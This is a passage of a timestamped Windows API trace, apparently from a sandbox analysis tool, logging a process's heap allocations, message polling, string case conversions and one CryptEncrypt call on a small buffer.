dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.531] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0255.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0255.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0255.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0255.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0255.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0255.533] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.533] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0255.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0255.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0255.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.534] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0255.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0255.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0255.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0255.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0255.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0255.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0255.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0255.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0255.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0255.535] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.536] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.537] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.537] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.537] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.538] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.538] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.538] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.541] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.542] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1858*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1858*, pdwDataLen=0x8bef68*=0x8) returned 1 [0255.542] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.542] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.542] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.542] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.542] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.542] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.542] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.543] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0255.543] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.543] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0255.543] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.543] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.543] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0255.543] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.543] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0255.543] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.543] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.543] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.543] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.543] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.543] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.543] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.543] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.544] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, 